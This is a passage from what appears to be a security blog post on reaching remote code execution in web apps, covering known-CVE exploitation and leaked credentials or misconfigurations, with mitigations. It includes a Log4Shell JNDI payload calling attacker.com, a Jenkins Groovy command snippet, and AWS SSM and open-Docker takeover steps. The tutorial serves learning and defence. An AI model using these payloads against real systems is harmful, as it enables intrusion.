Example scenario: A bug bounty hunter notices the target website’s HTTP response headers reveal it’s using Apache Tomcat 8.5.4. A quick search shows that Tomcat version has a known deserialization RCE (for example). The hunter obtains a published exploit script (often Python) for that CVE, adjusts the target details, and executes it — gaining a shell on the server. Another scenario: the target has an upload function and the response reveals an X-Powered-By: PHP/5.4.0. PHP 5.4.0 is extremely old and might have known exploits (maybe not a straightforward RCE, but perhaps an overflow). Or consider a Java web app using Spring; if it’s an old version, the well-known Spring4Shell exploit (CVE-2022-22965) might apply to achieve RCE via data binding. A concrete example from 2021: Many companies were hit by Log4Shell, an attacker could simply include ${jndi:ldap://attacker.com/a} in any input that got logged, and if the server was using a vulnerable Log4j library, it would fetch and execute attacker’s code (via LDAP)intigriti.com. The attacker in that case doesn’t exploit a bug in the app’s logic, but rather in a component the app uses.

Another example: an application running Drupal 7.x — Drupal had a famous RCE (Drupalgeddon) where an attacker could call PHP functions via a crafted request. If the site wasn’t patched, the attacker just needs to send that known payload. Similarly, something like a JBoss server with a known JMX console exploit, or an outdated WordPress plugin with RCE. Attackers will research the tech stack (via headers, URLs, or even asking the app “what version are you?” through error messages) and then choose an exploit from databases like Exploit-DB.

Tools & Techniques: The process often starts with reconnaissance: using tools like Nmap with version detection, WhatWeb, Wappalyzer, or simply examining HTTP headers and page source to identify software and versions. Once identified, checking vulnerability databases (CVE lists, Exploit-DB, etc.) for RCEs in those versions is next. Tools like searchsploit (part of Exploit-DB) can quickly show if an exploit is available locally. There are also automated scanners like Nuclei which have templates for known vulns (you can run a nuclei template for, say, “Tomcat CVE-2020-xyz” against the target). If an exploit exists and is not directly usable, the attacker might modify a proof-of-concept or use Metasploit modules. Metasploit has a wide range of RCE exploits for known CVEs; for example, the hunter might load exploit/multi/http/struts_dmi_exec for an Apache Struts RCE and fire it at the target. For less straightforward cases, an attacker might need to compile code or use curl and other tools to manually reproduce the HTTP requests described in an advisory. In the Log4Shell case, a simple command was enough (and maybe setting up a malicious LDAP server using a tool like marshalsec to serve the payload). Essentially, this approach leverages publicly available exploits – so the “tool” is whatever the exploit is written in (often Python, or a JAR for Java deserialization exploits, etc.). The attacker may also use vulnerability scanners (like Nessus, OpenVAS) in an engagement to find unpatched issues. A key aspect is version detection; sometimes the app hides version info, so attackers might use side-channels (default file paths, behavior, or known responses) to infer versions. Once they confirm a vulnerable version, they execute the attack script and hopefully get a shell.

Mitigation: The straightforward but challenging solution is stay up-to-date with patches and updates. Organizations must keep track of the components they use (inventory) and monitor for security advisories. Applying updates or security patches promptly closes these known holes Where immediate patching isn’t possible, use virtual patches or WAF rules to mitigate known exploit patterns (e.g., after Log4Shell, WAFs deployed rules to block ${jndi: strings). Additionally, design defense-in-depth: if your app server has a known RCE, having proper network segmentation, host-based firewall, and least privilege can limit damage (for example, running web servers as non-root, so an RCE doesn’t instantly mean root access). Dependency management is critical: use tools (like OWASP Dependency-Check, npm audit, etc.) to identify vulnerable libraries in your application and update them. Disable or remove unnecessary components – for instance, if a Tomcat installation isn’t using the AJP connector, disable it (there was an RCE via AJP in 2020). Employing an allowlist for outbound traffic can also stop some exploits (like preventing a component from downloading payloads). Finally, monitor public disclosures and have an incident response plan; many RCEs are exploited in the wild within days of disclosure, so speed is of the essence. By keeping systems patched and minimizing the window of exposure, you prevent attackers from simply using yesterday’s exploits on your apps.

10. Sensitive Data Exposure & Misconfigurations Leading to RCE

Explanation: Sometimes the easiest path to RCE is not through a code vulnerability, but through leaked credentials or misconfigurations. Sensitive data exposure refers to things like hardcoded passwords, API keys, private keys, or other secrets being unintentionally accessible. If an attacker finds such credentials, they might log in to an admin interface or service and directly execute code (or use features to upload code). Similarly, misconfigurations such as default admin passwords left unchanged, or debug modes left enabled in production, can grant an attacker administrative access. Once an attacker has admin-level access to an application or system, achieving RCE is often trivial (they can just use the system as intended to run commands or upload code). In a web app context, this might mean using an exposed SSH key to SSH into the server, using a leaked database password to connect and then using stored procedures to run OS commands, or accessing an open cloud management portal. Essentially, the attacker isn’t exploiting a “bug” in code but rather taking advantage of information or access that was mistakenly made available.

Example scenario (Credential leak): A common example is finding a GitHub repository (or a publicly exposed .env/config file on the server) that contains secrets, say the application’s .env file with AWS_ACCESS_KEY and AWS_SECRET_KEY, or a database URL with username and password. If an attacker obtains AWS keys that belong to the web app’s account, they could use those keys with AWS CLI to, for instance, start an EC2 instance under that account (for persistence), or more directly, use AWS Systems Manager to send commands to the running server (if it’s registered), or pull sensitive data from S3. If they get a DB password and the DB is accessible, they might connect and then use the SQL-to-RCE techniques mentioned earlier. Another scenario: an attacker finds a backup file like website_backup.zip on the web server (maybe via LFI or a careless backup in the web root) and inside it finds configuration with admin credentials. Using those, they log in to the web admin panel and from there use a feature to execute code (some CMS have “module upload” or “template edit” features that essentially let you run code).

Example scenario (Misconfigurations/defaults): An example is leaving a admin interface unprotected. For instance, a framework’s debug mode might provide a console (e.g., the Django Debug Toolbar or the Flask interactive debugger). If that is accessible in production, an attacker can often execute code on the server through it. Another example: Jenkins, a popular CI tool, has a script console that allows running arbitrary Groovy code on the server. If a Jenkins instance is network-accessible without proper auth (or with default creds), an attacker can just navigate to it and run println "Executing shell"; "whoami".execute() to get RCE. Default passwords are another classic: many appliances or admin panels have default creds like admin/admin. If those aren’t changed, the attacker just logs in and uses the interface normally to get RCE (e.g., on a network device with a web interface, maybe they enable SSH/telnet through the panel). In cloud, a misconfiguration might be leaving an AWS Lambda function with overly broad permissions such that an attacker triggering it (via a web hook) can make it write to an EC2 user-data and cause code execution. The possibilities are endless, but the unifying theme is the attacker didn’t hack code, they found a key or door that was left open.

Tools & Techniques: Finding leaked sensitive data often involves scanning code repos and the application for clues. Tools like truffleHog, GitLeaks, or even GitHub’s own secret scanning can find API keys or passwords in repositories. Attackers also use Google dorks or site-specific searches to find env files or backup dumps (site:target.com ext:env or looking for “password” in leaked files). On the running application, they might try common paths: /config.php.old, /backup.sql, or use directory brute-forcing (ffuf/gobuster) to find hidden files. For misconfigurations, port scanning with Nmap could reveal services like Redis with no auth or an open management port. Also, simply trying default creds on known admin portals (e.g., try admin/admin on /admin) is part of a pentester’s playbook. Tools like wpscan can enumerate users in WordPress and attempt default or weak passwords. If an SSH key is leaked, an attacker uses ssh to try logging in to the server. If a private key is found, they check if passwordless login is enabled for that key’s matching public key on any server. Once in (through SSH or admin web login), they effectively have RCE by using the system normally. For example, using a cloud API key: the attacker will configure AWS CLI with the key and run commands like aws ec2 describe-instances or aws ssm send-command to execute a command on all instances. Another example, if they find a Docker API port open (say port 2375 without auth), using docker CLI or curl they can deploy a new container (perhaps mounting the host filesystem) and achieve execution. Many such misconfig tools exist; for example kube-hunter for Kubernetes open dashboards, etc. In summary, the attacker’s “tool” is whatever the legitimate access method is (SSH client, cloud CLI, web login) once they have the credential or find the open door.

Mitigation: Protect your secrets and lock down configurations. Practically: never hardcode credentials or API keys in public code. Use environment variables or secret management services, and even then, don’t expose those via the app (ensure that .env or config files aren’t accessible from the web root). Implement proper access controls: no admin panels should be accessible without authentication, and ideally not accessible from the public internet at all. Change default passwords on all systems and enforce strong, unique passwords. Disable or secure debug and management interfaces – for instance, disable debug mode in production, require authentication for any admin console, and if possible, bind such services to localhost or a secure network. Use network segmentation: databases and internal tools should not be reachable from the outside world. Employ principle of least privilege for credentials: if an app only needs read access to an S3 bucket, don’t give it full AWS admin rights – that way even if keys leak, the damage is limited. Regularly scan your own infrastructure for open ports and services (using tools like Nmap) and review those. Monitor repositories (through automated scanning or Git hooks) to prevent committing secrets. Many cloud providers offer tools to detect exposed keys or config issues (e.g., AWS GuardDuty/Macie can detect if credentials appear on the internet). In short, be vigilant about any secret or admin functionality: assume attackers will find any secret that is available and will try common credentials. By keeping secrets safe, rotating keys regularly, and securing administrative access, you cut off an entire class of “easy RCE” that comes from misconfiguration rather than code exploitation.

Conclusion: Remote Code Execution is the ultimate prize for attackers on a web application, and as we’ve seen, there are many roads that lead there. We covered direct injection flaws (OS commands, SQL, template engines), file upload and inclusion tricks, logic flaws like deserialization, leveraging SSRF, social-engineering-assisted XSS attacks, and the importance of keeping software updated and configs tight. For each technique, understanding how to test and exploit it (ethically, in a controlled environment or engagement) helps defenders know what to protect against. The common thread is untrusted input or access leading to unintended execution of code — break that thread by validating input, reducing privileges, and patching known holes. By learning these techniques, penetration testers and bug hunters can improve their skills in finding critical RCE bugs, and developers can proactively harden their applications against them. Remember, the best offense is a good defense: knowing how these attacks work is the first step to preventing them. Stay safe and happy hacking!

Stay ethical, don’t be a fool. Let’s connect on LinkedIn!

--

--

Responses (1)